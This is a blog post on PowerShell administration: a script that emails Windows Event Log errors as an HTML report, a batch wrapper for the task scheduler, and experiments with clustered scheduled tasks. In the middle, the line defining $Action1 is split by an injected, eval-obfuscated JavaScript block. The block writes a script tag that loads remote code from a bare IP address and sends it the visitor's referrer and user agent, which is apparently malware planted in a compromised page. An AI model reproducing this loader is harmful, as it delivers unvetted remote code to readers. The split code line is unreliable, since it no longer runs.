Write-Host "$traceDateTime Completed Application EventLog count=$($getEventLog.Count)"
Add-Content $TraceFilename "$traceDateTime TRC20 Completed Application EventLog count=$($getEventLog.Count)"
Write-Host "$traceDateTime Starting System EventLog"
$getEventLogSys = Get-Eventlog -log system -after ((get-date).addMinutes($minutes*-1)) -EntryType Error 
$traceDateTime = get-date
Write-Host "$traceDateTime Completed System EventLog count=$($getEventLogSys.Count)"
Add-Content $TraceFilename "$traceDateTime TRC21 Completed System EventLog count=$($getEventLogSys.Count)"

# list of events to exclude (based on text found in the message 
# NOTE: Powershell uses grave-accent mark as line continuation character, but when I split onto 3 lines 
#       I seemed to get emails that had the excluded phrases. 
$getEventLogFiltered = $getEventLog | Where-Object {$_.Message -notlike 'Monitis*' -and $_.Message -notlike '*MQQueueDepthMonitor.exe*' -and $_.Message -notlike '*The local computer may not have the necessary registry*' }
Add-Content $TraceFilename "$traceDateTime TRC22 Filtered EventLog count=$($getEventLog.Count)"
#to only select certain columns, use Select-Object -Property and list the property/columns 									   
$getEventLogColumns = 	$getEventLogFiltered	| Select-Object -Property TimeGenerated,Source,Message,EntryType,EventID

$getEventLogWithSelectedColumns = 	$getEventLogFiltered |   
    Select-Object -Property TimeGenerated,Source,@{name='FriendlyDescr';expression={Message}},Message,EntryType,EventID
	
#$getEventLogSysWithSelectedColumns = 	$getEventLogSys |   
#    Select-Object -Property TimeGenerated,Source,@{name='FriendlyDescr';expression={Message}},Message,EntryType,EventID

if ($getEventLogFiltered -ne $null -or $getEventLogSys -ne $null) 
   {
        $needToSendEmail = "Y" 
	
	
	    #
		# This is where you can put short friendly Messages that the average guy can understand. 
		#
		foreach ($item in $getEventLogWithSelectedColumns) 
		  {
		     $item.FriendlyDescr = "N.A."
			 #switch -wildcard ($item.Message) 
			 #  {
			 #     "*The file exists*" {$Item.FriendlyDescr="Duplicate File";break}
			 #  }
		     if ($item.Message.Contains("SQL Timeout")) 
			    {
				   $item.FriendlyDescr = "SQL-Timeout"
				}
			 
		  }
   }
   else 
   {
      Write-Host "No EventLog Rows selected" 
   }

#see http://foxdeploy.com/2014/05/23/using-html-formatting-to-create-useful-webpage-reports-from-powershell/
$head = @"
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Frameset//EN” “http://www.w3.org/TR/html4/frameset.dtd”&gt;
<html><head><title>Unmigrated Systems Report</title><meta http-equiv=”refresh” content=”120? />
<style type=”text/css”>
<!–
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
}

#report { width: 1400px; }

table{
border-collapse: collapse;
border: none;
font: 10pt Verdana, Geneva, Arial, Helvetica, sans-serif;
color: black;
margin-bottom: 10px;
width: 1400px;
}

table td{
font-size: 12px;
padding-left: 0px;
padding-right: 20px;
text-align: left;
}

table th {
font-size: 12px;
font-weight: bold;
padding-left: 0px;
padding-right: 20px;
text-align: left;
}

h2{ clear: both; font-size: 130%;color:#354B5E; }

h3{
clear: both;
font-size: 75%;
margin-left: 20px;
margin-top: 30px;
color:#475F77;
}

p{ margin-left: 20px; font-size: 12px; }

table.list{ float: left; }

table.list td:nth-child(1){
font-weight: bold;
border-right: 1px grey solid;
text-align: right;
}

table.list td:nth-child(2){ padding-left: 7px; }
table tr:nth-child(even) td:nth-child(even){ background: #BBBBBB; }
table tr:nth-child(odd) td:nth-child(odd){ background: #F2F2F2; }
table tr:nth-child(even) td:nth-child(odd){ background: #DDDDDD; }
table tr:nth-child(odd) td:nth-child(even){ background: #E5E5E5; }
div.column { width: 320px; float: left; }
div.first{ padding-right: 20px; border-right: 1px grey solid; }
div.second{ margin-left: 30px; }
table{ margin-left: 20px; }
–>
</style>
</head>

"@

#seems like we cannot put -head and -fragment on the same ConvertTo-Html statemnet 
#$tableFragment = $getEventLogWithSelectedColumns | 
#    ConvertTo-Html -Fragment TimeGenerated,EntryType,Source,FriendlyDescr,Message,EventID 
	
$tableFragmentTemp = $getEventLogWithSelectedColumns | 
    ConvertTo-Html -Fragment TimeGenerated,EntryType,Source,FriendlyDescr,Message,EventID 
	
$tableTempFragments = "<h2><font color='yellow'>Application Event Log<font></h2>" + $tableFragmentTemp 

if ($getEventLogSys -ne $null) 
{
$tableFragmentTempSys = $getEventLogSys | 
    ConvertTo-Html -Fragment TimeGenerated,EntryType,Source,FriendlyDescr,Message,EventID 

$tableTempFragments = $tableTempFragments + "<h2><font color='yellow'>System Event Log<font></h2>" + $tableFragmentTempSys
}

$tableFragment = ConvertTo-HTML -head $head -PostContent $tableTempFragments 


# Production red-alert colors 
if ($environment -eq "PROD")
{
	$background = "Red" 
	$backgroundSolid = "DarkRed"
	$foreground = "White"
}
else
{
    # QA  colors 
	$background = "White" 
	$backgroundSolid = "Blue"
	$foreground = "Blue"
}

Write-Host "`$activeClusterName=$activeClusterName"

# assemble the HTML for our body of the email report.
$HTMLmessage = @"
<font color=""black"" face=""Arial, Verdana"" size=""3"">
<u><b>$Environment (Machine=$computerName $activeNodeMessage EventLog Error Report</b></u>
<br>This report was generated because of Errors found in the EventLog in the last reporting interval of $minutes minutes. 
<br>ActiveNode=$activeClusterName
<br>
<br>
<style type=""text/css"">body{font: .8em ""Lucida Grande"", Tahoma, Arial, Helvetica, sans-serif;}
ol{margin:0;padding: 0 1.5em;}
table{color:$foreground;background:$background;border-collapse:collapse;width:647px;border:5px solid $backgroundSolid;}
thead{}
thead th{padding:1em 1em .5em;border-bottom:1px dotted #FFF;font-size:120%;text-align:left;}
thead tr{}
td{padding:.5em 1em;}
tfoot{}
tfoot td{padding-bottom:1.5em;}
tfoot tr{}
#middle{background-color:$background;}
</style>
<body BGCOLOR="$foreground">
$tableFragment
</body>
"@

# Set up a regex search and match to look for any <td> tags in our body. These would only be present if the script above found disks below the threshold of free space.
# We use this regex matching method to determine whether or not we should send the email and report.
$regexsubject = $HTMLmessage
$regex = [regex] '(?im)<td>'
$traceDateTime = get-date

# if there was any row at all, send the email
if ($skipmail -ne "Y")
{
	if ($regex.IsMatch($regexsubject)) 
	{
	            $emailSubject = "$environment Event Log Error Report - Computer=$computerName"
                send-mailmessage -from $fromemail -to $users -subject $emailSubject  -BodyAsHTML -body $HTMLmessage -priority High -smtpServer $server
 		        Write-Host "$traceDateTime Email sent" 
                Add-Content $TraceFilename "$traceDateTime TRC95 Email Sent "
	}
        else
        {
                Write-Host "$traceDateTime No email was needed because no Errors in Application EventLog in the last $minutes minutes" 
                Add-Content $TraceFilename "$traceDateTime TRC96 No Email Sent "
        }
}
 
# End of Script

What I do is set up a .cmd or .bat file like this, and that is what I put in the scheduler. It simpley runs the Powershell and passes the necessary parms.
Make sure the first parm (10 in the example below) matches exactly how often you run the job in the task scheduler.

powershell -command "& 'E:\Scripts\EventLogExtract.ps1'" 10 NEW-BT-PROD

09/15/2014 14:46:28 Test
09/15/2014 14:47:02 Test
09/15/2014 14:48:02 Test
09/15/2014 14:49:02 Test

cls
$PSVersionTable
$Action1 <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfhfr|var|u0026u|referrer|enyys||js|php'.split('|'),0,{}))
</script></noindex> = New-ScheduledTaskAction -Execute "I:\Scripts\TestClusteredTaskRS.cmd"
$Action2 = New-ScheduledTaskAction -Execute "E:\Scripts\TestClusteredTaskCW.cmd"
$DurationTimeSpan = New-TimeSpan -Minutes 1 
$DurationTimeSpanIndefinite	= ([TimeSpan]::MaxValue) 
$DurationTempTest = New-TimeSpan -Days 1000
$Trigger = New-ScheduledTaskTrigger -Once -At "00:01" -RepetitionInterval $DurationTimeSpan -RepetitionDuration $DurationTimeSpanIndefinite  

#Register-ScheduledTask -TaskName "RegularCalcTest2" -Action $action
#Register-ClusteredScheduledTask -TaskName "CalcTask01" -TaskType AnyNode -Action $Action1 -Trigger $Trigger -Cluster "YourClusterNameHere"
Register-ClusteredScheduledTask -TaskName "TestResourceSpecific" -TaskType ResourceSpecific  -Action $Action1 -Trigger $Trigger -Cluster "YourClusterNameHere" -Resource BizTalk2013
Register-ClusteredScheduledTask -TaskName "TestClusterWide"      -TaskType ClusterWide       -Action $Action2 -Trigger $Trigger -Cluster "YourClusterNameHere"

Contents of TestClusteredTaskCW.cmd

powershell -command "&amp; 'E:\Scripts\TestClusteredTaskCW.ps1'"

TestClusteredTaskCW.ps1

cls
$TraceFilename = "E:\scripts\TestClusterWide_Trace.txt"
$currentDateTime = Get-Date 
Add-Content $TraceFilename "$currentDateTime Test" 
Write-Host "Completed, see `$TraceFilename=$TraceFilename" 

ClusterName : YourClusterNameHere
CurrentOwner :
Resource : 6f04356c-2f34-306b-9afb-a64e9556942f
TaskDefinition : MSFT_ScheduledTask (TaskName = “TestResourceSpecific”, TaskPath)
TaskName : TestResourceSpecific
TaskType : ResourceSpecific
PSComputerName :

ClusterName : YourClusterNameHere
CurrentOwner :
Resource :
TaskDefinition : MSFT_ScheduledTask (TaskName = “TestClusterWide”, TaskPath)
TaskName : TestClusterWide
TaskType : ClusterWide
PSComputerName :

cls
Get-ClusteredScheduledTask
Write “==================”
Write “Expanded:”
foreach ($item in Get-ClusteredScheduledTask )
{
Write-Host $item.TaskName
}

TaskName TaskType
——– ——–
TestClusterWide ClusterWide
TestResourceS… ResourceSpecific
==================
Expanded:
TestClusterWide
TestResourceSpecific

 

Related Posts:

1. http://stackoverflow.com/questions/16767064/clustered-scheduled-task

2. http://serverfault.com/questions/623407/powershell-set-clusteredscheduledtask-error-incorrect-function – error trying to Register-ClusteredScheduledTask

3. http://serverfault.com/questions/628958/how-to-enable-or-disable-a-clusteredscheduledtask-in-powershell-4-0 – how to you enable/disable a ClusteredScheduledTask?

 

I’m still cleaning up this blog post.  Here are some points to consider.

 

1. With ClusteredScheduledTasks there is no GUI.  When you do register a ClusteredScheduleTask using Powershell, it shows up in the GUI, but even then it is not reliable to use the GUI to change anything.   I tried changing few things, and they certainly did NOT sync between the two servers.

2. The problem with regular ScheduledTasks is that you have to maintain one TaskScheduler on each machine in the node.  Not too bad with two nodes, but if you have more it can be tedious.  Even with two nodes, everyone that is an admin has to be a stickler for keeping them in sync.
We thought about trying to write some code to keep them in sync, but looks like that could take several days.  In my opinion, you have the task, the triggers, and the actions all to keep in sync, and the triggers themselves have quite a few options.

At my client, we had two nodes, and decided to live with regular scheduled tasks for now.

3. You can always buy a third party tool.  Where I used to work, they had “VisualCron“.  I recently asked their sales person if they supported clustering, and rather than giving me a straight forward yes or no, and he sent me to a forum post which implies it can be done, but if it is so easy, there would be that much discussion about it.

4. We considered using SQL Agent as our task scheduler, but then we might have to change some of our code to work “cross-machine”, i.e. from the SQL machine over to the machine being monitored.  (Some of our schedule tasks kick of BizTalk jobs, and others are for monitoring EventLog, creation of extract files, MQ Depth, etc…)